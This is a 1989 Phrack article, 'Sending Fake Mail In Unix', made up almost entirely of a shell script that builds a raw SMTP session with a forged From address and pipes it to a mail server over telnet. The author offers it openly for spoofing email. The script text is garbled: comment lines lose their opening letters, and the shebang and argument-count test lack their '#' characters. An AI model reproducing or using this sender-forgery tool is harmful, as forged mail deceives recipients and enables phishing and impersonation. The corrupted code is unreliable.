==Phrack Inc.==

                    Volume Three, Issue 27, File 8 of 12

       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
       <><><><>                                              <><><><>
       <><><>             Sending Fake Mail In Unix            <><><>
       <><>                                                      <><>
       <>                     by Dark OverLord                     <>
       <><>                                                      <><>
       <><><>                   May 26, 1989                   <><><>
       <><><><>                                              <><><><>
       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>


Here is a shell script that can be use to send fakemail from any Unix system.
Have fun and stay out of trouble.


-Dark Overlord

       -=-=-=-=-=-=-=-=-=-=-=-=-=  Cut here -=-=-=-=-=-=-=-=-=-=-=-=-=
! /bin/sh
#Mfakemail - A shell script to send fakemail.
#M##M#Met up the path.
PATH=/usr/ucb:/bin:$HOME/Bin
#Marse the command line
case $ in
0)echo "USAGE: user@host [ from@somewhere ] [ mailer_host ]" >& 2
exit 1
;;
1)mailto=$1
from="person@campus"
mailerhost=localhost
;;
2)mailto=$1
from=$2
mailerhost=localhost
;;
3)mailto=$1
from=$2
mailerhost=$3
;;
*)echo "USAGE: user@host [ from@somewhere ] [ mailer_host" >& 2
exit 1
;;
esac
#Mreate a header for sendmail
cat <<E!O!F!> /tmp/cli$$
helo $mailerhost
mail from:$from<$from>
rcpt to: $mailto <$mailto>
data
From: $from
To: $mailto
Subject:
Status: RO


E!O!F!
#Mdit the mailer
vi /tmp/cli$$
#Mdd a ending for the mailer
cat <<E!O!F!>> /tmp/cli$$
.
quit
E!O!F!
#Monnect to the remote host's sendmail daemon
telnet $mailerhost smtp < /tmp/cli$$
#Mlean up time
/bin/rm -f /tmp/cli$$
_______________________________________________________________________________